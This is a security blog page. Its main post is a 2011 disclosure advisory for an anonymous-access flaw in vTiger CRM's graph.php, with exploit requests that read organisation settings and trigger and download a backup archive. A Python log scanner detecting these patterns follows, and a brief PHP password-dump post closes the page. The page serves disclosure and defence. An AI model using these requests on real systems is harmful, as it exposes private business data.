Posts tagged vulnerability

Advisory: MEDS-2011-01 – VTigerCRM Anonymous access to Setting Module


Hi,

Here is an old vulnerability submitted to the vTiger team last summer. As the 5.3 release was published some weeks ago, I can now publish this advisory.

Advisory: MEDS-2011-01 - VTigerCRM Anonymous access to Setting Module
using graph.php
Release Date: 2011-05-08
Author: Francois Harvey, gestion medsecure (francois.harvey at
medsecure dot ca) - http://medsecure.ca
Application: Vtiger CRM 5.2.x, 5.1.x
Severity: High
Risk: High
Vendor Status: notified, fixed in 5.3

OVERVIEW

"vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support."

VULNERABILITY

Some modules of vtiger CRM (many in Settings, but also Portal) do not
verify the user's access level and can be called anonymously through
the graph.php script. This vulnerability can be used to view or modify
some configuration settings (organisation name, templates, backup).

EXPLOIT

# Show Organization information

http://x.x.x.x/vtigercrm/graph.php?module=Settings&action=OrganizationConfig&parenttab=Settings

# Launching Backup and get the backup file (if enabled)

1) Start a Backup
POST /vtigercrm/graph.php
server_type=local_backup&module=Settings&action=BackupServerConfig&local_server_mode=&parenttab=Settings&enable_local_backup=on&backupnow=Backup+Now

2) Find the backup name in the output
Backed Up Successfully To File : ./backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip

3) Get the Dumpfile
GET /vtigercrm/backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip
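As an added example, not part of the advisory, here is a small log scanner that flags the request patterns described in the VULNERABILITY and EXPLOIT sections: graph.php reaching the Settings or Portal modules, POSTs to graph.php (whose body is not logged), and downloads from the backups directory. The access-log lines are constructed; the module names and paths are those the advisory gives.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [08/May/2011:10:01:02 +0000] "GET /vtigercrm/graph.php?module=Settings&action=OrganizationConfig&parenttab=Settings HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [08/May/2011:10:01:09 +0000] "POST /vtigercrm/graph.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.5 - - [08/May/2011:10:02:30 +0000] "GET /vtigercrm/backups/Vtiger-08%20May%202011%2010_01_15%20GMT.zip HTTP/1.1" 200 9876543 "-" "Mozilla/5.0"
10.0.0.9 - - [08/May/2011:10:03:00 +0000] "GET /vtigercrm/graph.php?module=Reports&action=ReportsAjax HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.7 - - [08/May/2011:10:04:00 +0000] "GET /vtigercrm/index.php?module=Settings&action=index HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Modules the advisory names as reachable without an access-level check via graph.php.
SENSITIVE_MODULES = {"Settings", "Portal"}


def classify(line):
    """Return a finding string for a suspicious request, or None for benign lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    qs = parse_qs(url.query)
    if path.endswith("/graph.php"):
        if m.group("method") == "POST":
            # POST bodies are not in the access log; any POST to graph.php deserves review.
            return f"{m.group('ip')}: POST to graph.php (body not logged, check module/action)"
        module = qs.get("module", [""])[0]
        if module in SENSITIVE_MODULES:
            action = qs.get("action", ["?"])[0]
            return f"{m.group('ip')}: graph.php used to reach {module}/{action}"
    # A successful fetch of a backup archive is the final step of the advisory's scenario.
    if "/backups/" in path and path.endswith(".zip") and m.group("status") == "200":
        return f"{m.group('ip')}: backup archive downloaded from {url.path}"
    return None


def scan(log_text):
    """Run classify() over every line and return the non-empty findings in order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests through index.php still pass the normal access checks and are left alone here; the Reports module line is likewise ignored, so the scanner only surfaces the graph.php and backup-download patterns.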

FIX

Upgrade to 5.3.x

AUTHOR
François Harvey - CISM/CISSP/TCSE
Information security professional
Gestion medsecure
medsecure.ca - francoisharvey.ca

PHP – Persistent Database Password


Is storing a password in clear text inside a hash a vulnerability or not? To me, yes, it's an insecure design bug and it should be fixed. But others think that untrusted binary extensions shouldn't run anyway, and if bad guys inject a rogue extension, it's already game over. So… here it is. Persistent database password dump proof of concept.

